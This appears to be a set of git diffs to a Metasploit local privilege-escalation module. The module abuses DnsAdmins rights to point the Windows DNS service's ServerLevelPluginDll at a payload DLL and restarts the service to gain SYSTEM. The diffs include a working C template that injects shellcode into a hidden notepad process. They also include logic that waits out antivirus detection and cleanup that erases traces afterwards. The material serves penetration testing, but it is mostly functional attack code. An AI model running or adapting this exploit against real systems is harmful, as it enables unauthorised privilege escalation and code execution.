     print_status("Sleeping for #{datastore['AVTIMEOUT']} seconds to ensure the file wasn't caught by any AV...")
     sleep(datastore['AVTIMEOUT'])
-    unless file_exist?("#{dllpath}")
-      print_error("Woops looks like the DLL got picked up by AV or somehow got deleted...")
+    unless file_exist?(dllpath.to_s)
+      print_error('Woops looks like the DLL got picked up by AV or somehow got deleted...')
       return
     end
     print_good("Looks like our file wasn't caught by the AV.")
-    print_warning("Entering danger section...")
+    print_warning('Entering danger section...')
 
     print_status("Modifying ServerLevelPluginDll to point to #{dllpath}...")
     dnscmd_result = cmd_exec("cmd.exe /c dnscmd \\\\#{sysinfo['Computer']} /config /serverlevelplugindll #{dllpath}").to_s.strip
-    unless dnscmd_result.include? "success"
+    unless dnscmd_result.include? 'success'
       fail_with(Failure::UnexpectedReply, dnscmd_result.split("\n")[0])
     end
 
     print_good(dnscmd_result.split("\n")[0])
 
     # restart the DNS service
-    print_status("Restarting the DNS service...")
+    print_status('Restarting the DNS service...')
     restart_service
   end
 
   def on_new_session(session)
-    if datastore['DLLPATH'].start_with?("\\\\")
+    if datastore['DLLPATH'].start_with?('\\\\')
       return
     else
       if session.type == 'meterpreter'
         session.core.use('stdapi') unless session.ext.aliases.include?('stdapi')
       end
 
-      vprint_status("Erasing ServerLevelPluginDll registry value...")
+      vprint_status('Erasing ServerLevelPluginDll registry value...')
       cmd_exec("cmd.exe /c dnscmd \\\\#{sysinfo['Computer']} /config /serverlevelplugindll")
-      print_good("Exited danger zone successfully!")
+      print_good('Exited danger zone successfully!')
 
       dllpath = expand_path("#{datastore['DLLPATH']}\\#{datastore['DLLNAME']}").strip
       restart_service('session' => session, 'dllpath' => dllpath)
@@ -269,39 +272,39 @@ class MetasploitModule < Msf::Exploit::Local
       dllpath = opts['dllpath']
     end
 
-    service_stop("DNS")
+    service_stop('DNS')
     # see if the service has really been stopped
     total_wait_time = 0
     loop do
-      svc_state = service_status("DNS")
+      svc_state = service_status('DNS')
       if svc_state[:state] == 1
         sleep 1
         break
       else
         sleep 2
         total_wait_time += 2
-        fail_with(Failure::TimeoutExpired, "Was unable to stop the DNS service after 3 minutes of trying...") if total_wait_time >= 90
+        fail_with(Failure::TimeoutExpired, 'Was unable to stop the DNS service after 3 minutes of trying...') if total_wait_time >= 90
       end
     end
 
     # clean up the dropped DLL
-    if session && dllpath && !datastore['DLLPATH'].start_with?("\\\\")
+    if session && dllpath && !datastore['DLLPATH'].start_with?('\\\\')
       vprint_status("Removing #{dllpath}...")
       session.fs.file.rm dllpath
     end
 
-    service_start("DNS")
+    service_start('DNS')
     # see if the service has really been started
     total_wait_time = 0
     loop do
-      svc_state = service_status("DNS")
+      svc_state = service_status('DNS')
       if svc_state[:state] == 4
         sleep 1
         break
       else
         sleep 2
         total_wait_time += 2
-        fail_with(Failure::TimeoutExpired, "Was unable to start the DNS service after 3 minutes of trying...") if total_wait_time >= 90
+        fail_with(Failure::TimeoutExpired, 'Was unable to start the DNS service after 3 minutes of trying...') if total_wait_time >= 90
       end
     end
   end
@@ -359,7 +362,7 @@ class MetasploitModule < Msf::Exploit::Local
         }
     |
 
-    c_template.gsub!("SHELLCODE_PLACEHOLDER", Rex::Text.to_hex(payload.raw).to_s)
+    c_template.gsub!('SHELLCODE_PLACEHOLDER', Rex::Text.to_hex(payload.raw).to_s)
 
     cpu = nil
     case arch
@@ -371,7 +374,7 @@ class MetasploitModule < Msf::Exploit::Local
       fail_with(Failure::NoTarget, 'Target arch is not compatible')
     end
 
-    print_status("Building DLL...")
+    print_status('Building DLL...')
     Metasploit::Framework::Compiler::Windows.compile_c(c_template, :dll, cpu)
   end
 end

--- a/modules/exploits/windows/local/dnsadmin_serverlevelplugindll.rb
+++ b/modules/exploits/windows/local/dnsadmin_serverlevelplugindll.rb
@@ -192,6 +192,7 @@ class MetasploitModule < Msf::Exploit::Local
     end
 
     # the service must be started before proceeding
+    total_wait_time = 0
     loop do
       svc_state = service_status("DNS")
       if svc_state[:state] == 4
@@ -199,6 +200,8 @@ class MetasploitModule < Msf::Exploit::Local
         break
       else
         sleep 2
+        total_wait_time += 2
+        fail_with(Failure::TimeoutExpired, "Was unable to start the DNS service after 3 minutes of trying...") if total_wait_time >= 90
       end
     end
 
@@ -268,6 +271,7 @@ class MetasploitModule < Msf::Exploit::Local
 
     service_stop("DNS")
     # see if the service has really been stopped
+    total_wait_time = 0
     loop do
       svc_state = service_status("DNS")
       if svc_state[:state] == 1
@@ -275,6 +279,8 @@ class MetasploitModule < Msf::Exploit::Local
         break
       else
         sleep 2
+        total_wait_time += 2
+        fail_with(Failure::TimeoutExpired, "Was unable to stop the DNS service after 3 minutes of trying...") if total_wait_time >= 90
       end
     end
 
@@ -286,6 +292,7 @@ class MetasploitModule < Msf::Exploit::Local
 
     service_start("DNS")
     # see if the service has really been started
+    total_wait_time = 0
     loop do
       svc_state = service_status("DNS")
       if svc_state[:state] == 4
@@ -293,6 +300,8 @@ class MetasploitModule < Msf::Exploit::Local
         break
       else
         sleep 2
+        total_wait_time += 2
+        fail_with(Failure::TimeoutExpired, "Was unable to start the DNS service after 3 minutes of trying...") if total_wait_time >= 90
       end
     end
   end

--- a/modules/exploits/windows/local/dnsadmin_serverlevelplugindll.rb
+++ b/modules/exploits/windows/local/dnsadmin_serverlevelplugindll.rb
@@ -3,6 +3,8 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
+require 'metasploit/framework/compiler/windows'
+
 class MetasploitModule < Msf::Exploit::Local
   Rank = NormalRanking
 
@@ -17,7 +19,8 @@ class MetasploitModule < Msf::Exploit::Local
         This module exploits a feature in the DNS service of Windows Server. Users of the DnsAdmins group can set the
         `ServerLevelPluginDll` value using dnscmd.exe to create a registry key at `HKLM\SYSTEM\CurrentControlSet\services\DNS\Parameters\`
         named `ServerLevelPluginDll` that can be made to point to an arbitrary DLL. After doing so, restarting the service
-        will load the DLL and cause it to execute, providing us with SYSTEM privileges.
+        will load the DLL and cause it to execute, providing us with SYSTEM privileges. Increasing WfsDelay is recommended
+        when using a UNC path.
       ),
       'References'     =>
         [
@@ -37,15 +40,21 @@ class MetasploitModule < Msf::Exploit::Local
       'SessionTypes'   => [ 'meterpreter' ],
       'DefaultOptions' =>
         {
-          'WfsDelay' => 30,
+          'WfsDelay' => 20,
           'EXITFUNC' => 'thread'
+        },
+      'Notes'          =>
+        {
+          'Stability'   => [CRASH_SAFE],
+          'SideEffects' => [CONFIG_CHANGES, IOC_IN_LOGS]
         })
     )
 
     register_options(
       [
-        OptString.new('DLLNAME', [ false, 'DLL name (default: msf.dll)', "msf.dll"]),
-        OptString.new('DLLPATH', [ false, 'Path to DLL. Can be a UNC path. (default: %TEMP%)', "%TEMP%"])
+        OptString.new('DLLNAME', [ true, 'DLL name (default: msf.dll)', "msf.dll"]),
+        OptString.new('DLLPATH', [ true, 'Path to DLL. Can be a UNC path. (default: %TEMP%)', "%TEMP%"]),
+        OptBool.new('MAKEDLL', [ true, 'Just create the DLL, do not exploit.', false])
       ]
     )
 
@@ -137,13 +146,25 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def exploit
-    if is_system?
-      fail_with(Failure::BadConfig, "Session is already elevated!")
-    end
-
+    # get system architecture
     arch = sysinfo['Architecture']
     if arch != payload_instance.arch.first
       fail_with(Failure::BadConfig, "Wrong payload architecture!")
+    end
+
+    # no exploit, just create the DLL
+    if datastore['MAKEDLL'] == true
+      # copypasta from lib/msf/core/exploit/fileformat.rb
+      # writes the generated DLL to ~/.msf4/local/
+      dllname = datastore['DLLNAME']
+      full_path = store_local("dll", nil, make_serverlevelplugindll(arch), dllname)
+      print_good("#{dllname} stored at #{full_path}")
+      return
+    end
+
+    # will exploit
+    if is_system?
+      fail_with(Failure::BadConfig, "Session is already elevated!")
     end
 
     unless [CheckCode::Vulnerable].include? check
@@ -153,11 +174,20 @@ class MetasploitModule < Msf::Exploit::Local
     # if the DNS service is not started, it will throw RPC_S_SERVER_UNAVAILABLE when trying to set ServerLevelPluginDll
     print_status("Checking service state...")
     svc_state = service_status("DNS")
-    if svc_state[:state] == 4
-      print_status("DNS service is running, proceeding...")
-    else
+    unless svc_state[:state] == 4
       print_status("DNS service is stopped, starting it...")
       service_start("DNS")
+    end
+
+    # the service must be started before proceeding
+    loop do
+      svc_state = service_status("DNS")
+      if svc_state[:state] == 4
+        sleep 1
+        break
+      else
+        sleep 2
+      end
     end
 
     # the if block assumes several things:
@@ -169,79 +199,14 @@ class MetasploitModule < Msf::Exploit::Local
     if datastore['DLLPATH'].start_with?("\\\\")
       # check if "Enable insecure guest logons" is enabled on the target system
       allow_insecure_guest_auth = registry_getvaldata("HKLM\\SYSTEM\\CurrentControlSet\\Services\\LanmanWorkstation\\Parameters", "AllowInsecureGuestAuth")
-      if allow_insecure_guest_auth == 1
+      unless allow_insecure_guest_auth == 1
         fail_with(Failure::BadConfig, "'Enable insecure guest logons' is not set to Enabled on the target system!")
       end
 
       print_status("Using user-provided UNC path.")
     else
-      # generate the payload
-      payload = generate_payload
-      # the C template for the ServerLevelPluginDll DLL
-      c_template = %|
-          #include <Windows.h>
-          #include <stdlib.h>
-          #include <String.h>
-
-          BOOL APIENTRY DllMain __attribute__((export))(HMODULE hModule, DWORD dwReason, LPVOID lpReserved) {
-              switch (dwReason) {
-                  case DLL_PROCESS_ATTACH:
-                  case DLL_THREAD_ATTACH:
-                  case DLL_THREAD_DETACH:
-                  case DLL_PROCESS_DETACH:
-                      break;
-              }
-
-              return TRUE;
-          }
-
-          int DnsPluginCleanup __attribute__((export))(void) { return 0; }
-          int DnsPluginQuery __attribute__((export))(PVOID a1, PVOID a2, PVOID a3, PVOID a4) { return 0; }
-          int DnsPluginInitialize __attribute__((export))(PVOID a1, PVOID a2) {
-              STARTUPINFO startup_info;
-              PROCESS_INFORMATION process_info;
-              char throwaway_buffer[8];
-
-              ZeroMemory(&startup_info, sizeof(startup_info));
-              startup_info.cb = sizeof(STARTUPINFO);
-              startup_info.dwFlags = STARTF_USESHOWWINDOW;
-              startup_info.wShowWindow = 0;
-
-              if (CreateProcess(NULL, "C:\\\\Windows\\\\System32\\\\notepad.exe", NULL, NULL, FALSE, 0, NULL, NULL, &startup_info, &process_info)) {
-                  HANDLE processHandle;
-                  HANDLE remoteThread;
-                  PVOID remoteBuffer;
-
-                  unsigned char shellcode[] = "\xaa\xbb\xcc\xdd";
-
-                  processHandle = OpenProcess(0x1F0FFF, FALSE, process_info.dwProcessId);
-                  remoteBuffer = VirtualAllocEx(processHandle, NULL, sizeof shellcode, 0x3000, PAGE_EXECUTE_READWRITE);
-                  WriteProcessMemory(processHandle, remoteBuffer, shellcode, sizeof shellcode, NULL);
-                  remoteThread = CreateRemoteThread(processHandle, NULL, 0, (LPTHREAD_START_ROUTINE)remoteBuffer, NULL, 0, NULL);
-
-                  CloseHandle(process_info.hThread);
-                  CloseHandle(processHandle);
-              }
-
-          return 0;
-        }
-      |
-
-      c_template.gsub!("\xaa\xbb\xcc\xdd", Rex::Text.to_hex(payload.raw).to_s)
-
-      cpu = nil
-      if arch == "x86"
-        cpu = Metasm::Ia32.new
-      elsif arch == "x64"
-        cpu = Metasm::X86_64.new
-      end
-
-      print_status("Building DLL...")
-      require 'metasploit/framework/compiler/windows'
-      dll = Metasploit::Framework::Compiler::Windows.compile_c(c_template, :dll, cpu)
-
       print_status("Writing DLL to #{dllpath}...")
-      write_file(dllpath, dll)
+      write_file(dllpath, make_serverlevelplugindll(arch))
     end
 
     print_status("Modifying ServerLevelPluginDll to point to #{dllpath}...")
@@ -251,27 +216,10 @@ class MetasploitModule < Msf::Exploit::Local
     end
 
     print_good(dnscmd_result.split("\n")[0])
+
+    # restart the DNS service
     print_status("Restarting the DNS service...")
-    service_stop("DNS")
-    # we can't continue until the DNS service is really stopped
-    loop do
-      svc_state = service_status("DNS")
-      if svc_state[:state] == 1
-        break
-      else
-        sleep 2
-      end
-    end
-    service_start("DNS")
-    # similarly, we can't continue until the DNS service is really started
-    loop do
-      svc_state = service_status("DNS")
-      if svc_state[:state] == 4
-        break
-      else
-        sleep 2
-      end
-    end
+    restart_service
   end
 
   def on_new_session(session)
@@ -286,30 +234,114 @@ class MetasploitModule < Msf::Exploit::Local
       cmd_exec("cmd.exe /c dnscmd \\\\#{sysinfo['Computer']} /config /serverlevelplugindll")
 
       dllpath = expand_path("#{datastore['DLLPATH']}\\#{datastore['DLLNAME']}").strip
-      delete_serverlevelplugindll(session, dllpath)
+      restart_service('session' => session, 'dllpath' => dllpath)
     end
   end
 
-  def delete_serverlevelplugindll(session, dllpath)
+  def restart_service(opts = {})
+    # for deleting the DLL
+    if opts['session'] && opts['dllpath']
+      session = opts['session']
+      dllpath = opts['dllpath']
+    end
+
     service_stop("DNS")
+    # see if the service has really been stopped
     loop do
       svc_state = service_status("DNS")
       if svc_state[:state] == 1
+        sleep 1
         break
       else
         sleep 2
       end
     end
-    vprint_status("Removing #{dllpath}...")
-    session.fs.file.rm dllpath
+
+    # clean up the dropped DLL
+    if session && dllpath && !datastore['DLLPATH'].start_with?("\\\\")
+      vprint_status("Removing #{dllpath}...")
+      session.fs.file.rm dllpath
+    end
+
     service_start("DNS")
+    # see if the service has really been started
     loop do
       svc_state = service_status("DNS")
       if svc_state[:state] == 4
+        sleep 1
         break
       else
         sleep 2
       end
     end
+  end
+
+  def make_serverlevelplugindll(arch)
+    # generate the payload
+    payload = generate_payload
+    # the C template for the ServerLevelPluginDll DLL
+    c_template = %|
+        #include <Windows.h>
+        #include <stdlib.h>
+        #include <String.h>
+
+        BOOL APIENTRY DllMain __attribute__((export))(HMODULE hModule, DWORD dwReason, LPVOID lpReserved) {
+            switch (dwReason) {
+                case DLL_PROCESS_ATTACH:
+                case DLL_THREAD_ATTACH:
+                case DLL_THREAD_DETACH:
+                case DLL_PROCESS_DETACH:
+                    break;
+            }
+
+            return TRUE;
+        }
+
+        int DnsPluginCleanup __attribute__((export))(void) { return 0; }
+        int DnsPluginQuery __attribute__((export))(PVOID a1, PVOID a2, PVOID a3, PVOID a4) { return 0; }
+        int DnsPluginInitialize __attribute__((export))(PVOID a1, PVOID a2) {
+            STARTUPINFO startup_info;
+            PROCESS_INFORMATION process_info;
+            char throwaway_buffer[8];
+
+            ZeroMemory(&startup_info, sizeof(startup_info));
+            startup_info.cb = sizeof(STARTUPINFO);
+            startup_info.dwFlags = STARTF_USESHOWWINDOW;
+            startup_info.wShowWindow = 0;
+
+            if (CreateProcess(NULL, "C:\\\\Windows\\\\System32\\\\notepad.exe", NULL, NULL, FALSE, 0, NULL, NULL, &startup_info, &process_info)) {
+                HANDLE processHandle;
+                HANDLE remoteThread;
+                PVOID remoteBuffer;
+
+                unsigned char shellcode[] = "SHELLCODE_PLACEHOLDER";
+
+                processHandle = OpenProcess(0x1F0FFF, FALSE, process_info.dwProcessId);
+                remoteBuffer = VirtualAllocEx(processHandle, NULL, sizeof shellcode, 0x3000, PAGE_EXECUTE_READWRITE);
+                WriteProcessMemory(processHandle, remoteBuffer, shellcode, sizeof shellcode, NULL);
+                remoteThread = CreateRemoteThread(processHandle, NULL, 0, (LPTHREAD_START_ROUTINE)remoteBuffer, NULL, 0, NULL);
+
+                CloseHandle(process_info.hThread);
+                CloseHandle(processHandle);
+            }
+
+            return 0;
+        }
+    |
+
+    c_template.gsub!("SHELLCODE_PLACEHOLDER", Rex::Text.to_hex(payload.raw).to_s)
+
+    cpu = nil
+    case arch
+    when 'x86'
+      cpu = Metasm::Ia32.new
+    when 'x64'
+      cpu = Metasm::X86_64.new
+    else
+      fail_with(Failure::NoTarget, 'Target arch is not compatible')
+    end
+
+    print_status("Building DLL...")
+    Metasploit::Framework::Compiler::Windows.compile_c(c_template, :dll, cpu)
   end
 end

--- a/modules/exploits/windows/local/dnsadmin_serverlevelplugindll.rb
+++ b/modules/exploits/windows/local/dnsadmin_serverlevelplugindll.rb
@@ -4,7 +4,7 @@
 ##
 
 class MetasploitModule < Msf::Exploit::Local
-  Rank = GreatRanking
+  Rank = NormalRanking
 
   include Msf::Exploit::EXE
   include Msf::Post::File
@@ -35,7 +35,7 @@ class MetasploitModule < Msf::Exploit::Local
           'Imran E. Dawoodjee <imran[at]threathounds.com>' # Metasploit module
         ],
       'Platform'       => 'win',
-      'Targets'        => [['Automatic', {}]],
+      'Targets'        => [[ 'Automatic', {} ]],
       'SessionTypes'   => [ 'meterpreter' ],
       'DefaultOptions' => { 'WfsDelay' => 10 })
     )
@@ -51,6 +51,11 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def check
+    if is_system?
+      print_status("Session is already elevated!")
+      return Exploit::CheckCode::Unknown
+    end
+
     username = client.sys.config.getuid
     user_sid = client.sys.config.getsid
     hostname = sysinfo['Computer']
@@ -128,12 +133,16 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def exploit
+    if is_system?
+      fail_with(Failure::None, "Session is already elevated!")
+    end
+
     if sysinfo['Architecture'] != payload_instance.arch.first
       fail_with(Failure::BadConfig, "Wrong payload architecture!")
     end
 
     unless [CheckCode::Vulnerable].include? check
-      fail_with Failure::NotVulnerable, "Target is most likely not vulnerable!"
+      fail_with(Failure::NotVulnerable, "Target is most likely not vulnerable!")
     end
 
     # if the DNS service is not started, it will throw RPC_S_SERVER_UNAVAILABLE when trying to set ServerLevelPluginDll
@@ -156,7 +165,7 @@ class MetasploitModule < Msf::Exploit::Local
       # check if "Enable insecure guest logons" is enabled on the target system
       allow_insecure_guest_auth = registry_getvaldata("HKLM\\SYSTEM\\CurrentControlSet\\Services\\LanmanWorkstation\\Parameters", "AllowInsecureGuestAuth")
       if allow_insecure_guest_auth == 1
-        fail_with Failure::BadConfig, "'Enable insecure guest logons' is not set to Enabled on the target system!"
+        fail_with(Failure::BadConfig, "'Enable insecure guest logons' is not set to Enabled on the target system!")
       end
 
       print_status("Using user-provided UNC path.")
@@ -178,7 +187,7 @@ class MetasploitModule < Msf::Exploit::Local
       service_stop("DNS")
       service_start("DNS")
     else
-      fail_with Failure::UnexpectedReply, dnscmd_result.split("\n")[0]
+      fail_with(Failure::UnexpectedReply, dnscmd_result.split("\n")[0])
     end
   end
 end

--- a/modules/exploits/windows/local/dnsadmin_serverlevelplugindll.rb
+++ b/modules/exploits/windows/local/dnsadmin_serverlevelplugindll.rb
@@ -35,7 +35,11 @@ class MetasploitModule < Msf::Exploit::Local
       'Platform'       => 'win',
       'Targets'        => [[ 'Automatic', {} ]],
       'SessionTypes'   => [ 'meterpreter' ],
-      'DefaultOptions' => { 'WfsDelay' => 10 })
+      'DefaultOptions' =>
+        {
+          'WfsDelay' => 30,
+          'EXITFUNC' => 'thread'
+        })
     )
 
     register_options(
@@ -49,6 +53,13 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def check
+    if sysinfo['OS'] =~ /Windows 20(03|08|12|16+)/
+      vprint_good("OS seems vulnerable.")
+    else
+      vprint_error("OS is not vulnerable!")
+      return Exploit::CheckCode::Safe
+    end
+
     username = client.sys.config.getuid
     user_sid = client.sys.config.getsid
     hostname = sysinfo['Computer']
@@ -164,30 +175,54 @@ class MetasploitModule < Msf::Exploit::Local
 
       print_status("Using user-provided UNC path.")
     else
+      # generate the payload
       payload = generate_payload
-      c_template = %Q|
-        #include <Windows.h>
-        #include <stdlib.h>
-        #include <String.h>
+      # the C template for the ServerLevelPluginDll DLL
+      c_template = %|
+          #include <Windows.h>
+          #include <stdlib.h>
+          #include <String.h>
 
-        BOOL APIENTRY DllMain __attribute__((export))(HMODULE hModule, DWORD dwReason, LPVOID lpReserved) {
-          switch (dwReason) {
-            case DLL_PROCESS_ATTACH:
-            case DLL_THREAD_ATTACH:
-            case DLL_THREAD_DETACH:
-            case DLL_PROCESS_DETACH:
-              break;
+          BOOL APIENTRY DllMain __attribute__((export))(HMODULE hModule, DWORD dwReason, LPVOID lpReserved) {
+              switch (dwReason) {
+                  case DLL_PROCESS_ATTACH:
+                  case DLL_THREAD_ATTACH:
+                  case DLL_THREAD_DETACH:
+                  case DLL_PROCESS_DETACH:
+                      break;
+              }
+
+              return TRUE;
           }
-          return TRUE;
-        }
 
-        int DnsPluginCleanup __attribute__((export))(void) { return 0; }
-        int DnsPluginQuery __attribute__((export))(PVOID a1, PVOID a2, PVOID a3, PVOID a4) { return 0; }
-        int DnsPluginInitialize __attribute__((export))(PVOID a1, PVOID a2) {
-          char shellcode[] = "\xaa\xbb\xcc\xdd";
-          void *exec = VirtualAlloc(0, sizeof shellcode, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
-          memcpy(exec, shellcode, sizeof shellcode);
-          ((void(*)())exec)();
+          int DnsPluginCleanup __attribute__((export))(void) { return 0; }
+          int DnsPluginQuery __attribute__((export))(PVOID a1, PVOID a2, PVOID a3, PVOID a4) { return 0; }
+          int DnsPluginInitialize __attribute__((export))(PVOID a1, PVOID a2) {
+              STARTUPINFO startup_info;
+              PROCESS_INFORMATION process_info;
+              char throwaway_buffer[8];
+
+              ZeroMemory(&startup_info, sizeof(startup_info));
+              startup_info.cb = sizeof(STARTUPINFO);
+              startup_info.dwFlags = STARTF_USESHOWWINDOW;
+              startup_info.wShowWindow = 0;
+
+              if (CreateProcess(NULL, "C:\\\\Windows\\\\System32\\\\notepad.exe", NULL, NULL, FALSE, 0, NULL, NULL, &startup_info, &process_info)) {
+                  HANDLE processHandle;
+                  HANDLE remoteThread;
+                  PVOID remoteBuffer;
+
+                  unsigned char shellcode[] = "\xaa\xbb\xcc\xdd";
+
+                  processHandle = OpenProcess(0x1F0FFF, FALSE, process_info.dwProcessId);
+                  remoteBuffer = VirtualAllocEx(processHandle, NULL, sizeof shellcode, 0x3000, PAGE_EXECUTE_READWRITE);
+                  WriteProcessMemory(processHandle, remoteBuffer, shellcode, sizeof shellcode, NULL);
+                  remoteThread = CreateRemoteThread(processHandle, NULL, 0, (LPTHREAD_START_ROUTINE)remoteBuffer, NULL, 0, NULL);
+
+                  CloseHandle(process_info.hThread);
+                  CloseHandle(processHandle);
+              }
+
           return 0;
         }
       |
@@ -218,6 +253,63 @@ class MetasploitModule < Msf::Exploit::Local
     print_good(dnscmd_result.split("\n")[0])
     print_status("Restarting the DNS service...")
     service_stop("DNS")
+    # we can't continue until the DNS service is really stopped
+    loop do
+      svc_state = service_status("DNS")
+      if svc_state[:state] == 1
+        break
+      else
+        sleep 2
+      end
+    end
     service_start("DNS")
+    # similarly, we can't continue until the DNS service is really started
+    loop do
+      svc_state = service_status("DNS")
+      if svc_state[:state] == 4
+        break
+      else
+        sleep 2
+      end
+    end
+  end
+
+  def on_new_session(session)
+    if datastore['DLLPATH'].start_with?("\\\\")
+      return
+    else
+      if session.type == 'meterpreter'
+        session.core.use('stdapi') unless session.ext.aliases.include?('stdapi')
+      end
+
+      vprint_status("Erasing ServerLevelPluginDll registry value...")
+      cmd_exec("cmd.exe /c dnscmd \\\\#{sysinfo['Computer']} /config /serverlevelplugindll")
+
+      dllpath = expand_path("#{datastore['DLLPATH']}\\#{datastore['DLLNAME']}").strip
+      delete_serverlevelplugindll(session, dllpath)
+    end
+  end
+
+  def delete_serverlevelplugindll(session, dllpath)
+    service_stop("DNS")
+    loop do
+      svc_state = service_status("DNS")
+      if svc_state[:state] == 1
+        break
+      else
+        sleep 2
+      end
+    end
+    vprint_status("Removing #{dllpath}...")
+    session.fs.file.rm dllpath
+    service_start("DNS")
+    loop do
+      svc_state = service_status("DNS")
+      if svc_state[:state] == 4
+        break
+      else
+        sleep 2
+      end
+    end
   end
 end

--- a/modules/exploits/windows/local/dnsadmin_serverlevelplugindll.rb
+++ b/modules/exploits/windows/local/dnsadmin_serverlevelplugindll.rb
@@ -11,16 +11,27 @@ class MetasploitModule < Msf::Exploit::Local
   include Msf::Post::File
   include Msf::Post::Windows::Priv
   include Msf::Post::Windows::Services
+  include Msf::Exploit::FileDropper
 
   def initialize(info = {})
     super(update_info(info,
       'Name'           => 'DnsAdmin ServerLevelPluginDll Feature Abuse Privilege Escalation',
       'Description'    => %q(
         This module exploits a feature in the DNS service of Windows Server. Users of the DnsAdmins group can set the
-        `ServerLevelPluginDll` value using dnscmd.exe to create a registry key at `HKLM\SYSTEM\CurrentControlSet\services\DNS\Parameters\`
+        `ServerLevelPluginDll` value using dnscmd.exe to create a registry key at `HKLM\\SYSTEM\\CurrentControlSet\\Services\\DNS\\Parameters\\`
         named `ServerLevelPluginDll` that can be made to point to an arbitrary DLL. After doing so, restarting the service
         will load the DLL and cause it to execute, providing us with SYSTEM privileges. Increasing WfsDelay is recommended
         when using a UNC path.
+
+        Note that there is a slight possibilty that antivirus may pick up on the DLL file which is dropped on the system for this
+        exploit to work. In this case it will not be possible to restart the DNS service via the Service Manager. To resolve this, 
+        users must first delete the `ServerLevelPluginDll` value under the `HKLM\\SYSTEM\\CurrentControlSet\\Services\\DNS\\Parameters\\` 
+        key using an administrator account, after which they will then be able to restart the DNS service once again.
+
+        To avoid the potential of this occuring, this module has a configurable option, `AVTIMEOUT`, which allows users to configure
+        how long they would like to wait for any potential AV to pick up on the file after which the module will then check to 
+        ensure the dropped DLL file exists prior to creating the `ServerLevelPluginDll` value within the 
+        `HKLM\\SYSTEM\\CurrentControlSet\\Services\\DNS\\Parameters\\` key.
       ),
       'References'     =>
         [
@@ -54,7 +65,8 @@ class MetasploitModule < Msf::Exploit::Local
       [
         OptString.new('DLLNAME', [ true, 'DLL name (default: msf.dll)', "msf.dll"]),
         OptString.new('DLLPATH', [ true, 'Path to DLL. Can be a UNC path. (default: %TEMP%)', "%TEMP%"]),
-        OptBool.new('MAKEDLL', [ true, 'Just create the DLL, do not exploit.', false])
+        OptBool.new('MAKEDLL', [ true, 'Just create the DLL, do not exploit.', false]),
+        OptInt.new('AVTIMEOUT', [true, 'Time to wait for AV to potentially notice the DLL file we dropped, in seconds.', 60])
       ]
     )
 
@@ -202,12 +214,20 @@ class MetasploitModule < Msf::Exploit::Local
       unless allow_insecure_guest_auth == 1
         fail_with(Failure::BadConfig, "'Enable insecure guest logons' is not set to Enabled on the target system!")
       end
-
       print_status("Using user-provided UNC path.")
     else
-      print_status("Writing DLL to #{dllpath}...")
       write_file(dllpath, make_serverlevelplugindll(arch))
+      print_good("Wrote DLL to #{dllpath}!")
     end
+
+    print_status("Sleeping for #{datastore['AVTIMEOUT']} seconds to ensure the file wasn't caught by any AV...")
+    sleep(datastore['AVTIMEOUT'])
+    unless file_exist?("#{dllpath}")
+      print_error("Woops looks like the DLL got picked up by AV or somehow got deleted...")
+      return
+    end
+    print_good("Looks like our file wasn't caught by the AV.")
+    print_warning("Entering danger section...")
 
     print_status("Modifying ServerLevelPluginDll to point to #{dllpath}...")
     dnscmd_result = cmd_exec("cmd.exe /c dnscmd \\\\#{sysinfo['Computer']} /config /serverlevelplugindll #{dllpath}").to_s.strip
@@ -232,6 +252,7 @@ class MetasploitModule < Msf::Exploit::Local
 
       vprint_status("Erasing ServerLevelPluginDll registry value...")
       cmd_exec("cmd.exe /c dnscmd \\\\#{sysinfo['Computer']} /config /serverlevelplugindll")
+      print_good("Exited danger zone successfully!")
 
       dllpath = expand_path("#{datastore['DLLPATH']}\\#{datastore['DLLNAME']}").strip
       restart_service('session' => session, 'dllpath' => dllpath)

--- a/modules/exploits/windows/local/dnsadmin_serverlevelplugindll.rb
+++ b/modules/exploits/windows/local/dnsadmin_serverlevelplugindll.rb
@@ -25,15 +25,16 @@ class MetasploitModule < Msf::Exploit::Local
           will load the DLL and cause it to execute, providing us with SYSTEM privileges. Increasing WfsDelay is recommended
           when using a UNC path.
 
-          Note that there is a slight possibilty that antivirus may pick up on the DLL file which is dropped on the system for this
-          exploit to work. In this case it will not be possible to restart the DNS service via the Service Manager. To resolve this,
-          users must first delete the `ServerLevelPluginDll` value under the `HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters\`
-          key using an administrator account, after which they will then be able to restart the DNS service once again.
+          Users should note that if the DLLPath variable of this module is set to a UNC share that does not exist,
+          the DNS server on the target will not be able to restart. Similarly if a UNC share is not utilized, and
+          users instead opt to drop a file onto the disk of the target computer, and this gets picked up by Anti-Virus
+          after the timeout specified by `AVTIMEOUT` expires, its possible that the `ServerLevelPluginDll` value of the
+          `HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters\` key on the target computer may point to an nonexistant DLL,
+          which will also prevent the DNS server from being able to restart. Users are advised to refer to the documentation for
+          this module for advice on how to resolve this issue should it occur.
 
-          To avoid the potential of this occuring, this module has a configurable option, `AVTIMEOUT`, which allows users to configure
-          how long they would like to wait for any potential AV to pick up on the file after which the module will then check to
-          ensure the dropped DLL file exists prior to creating the `ServerLevelPluginDll` value within the
-          `HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters\` key.
+          This module has only been tested and confirmed to work on Windows Server 2019 Standard Edition, however it should work against any Windows
+          Server version up to and including Windows Server 2019.
         },
         'References' =>
           [
@@ -58,8 +59,10 @@ class MetasploitModule < Msf::Exploit::Local
           },
         'Notes' =>
           {
-            'Stability' => [CRASH_SAFE],
-            'SideEffects' => [CONFIG_CHANGES, IOC_IN_LOGS]
+            'Stability' => [CRASH_SERVICE_DOWN], # The service can go down if AV picks up on the file at an
+            # non-optimal time or if the UNC path is typed in wrong.
+            'SideEffects' => [CONFIG_CHANGES, IOC_IN_LOGS],
+            'Reliability' => [REPEATABLE_SESSION]
           }
       )
     )
@@ -229,7 +232,7 @@ class MetasploitModule < Msf::Exploit::Local
 
       build_num_gemversion = Gem::Version.new(build_num)
 
-      # If the target is running Windows 10 or Windows Server versions with a 
+      # If the target is running Windows 10 or Windows Server versions with a
       # build number of 16299 or later, aka v1709 or later, then we need to check
       # if "Enable insecure guest logons" is enabled on the target system as per
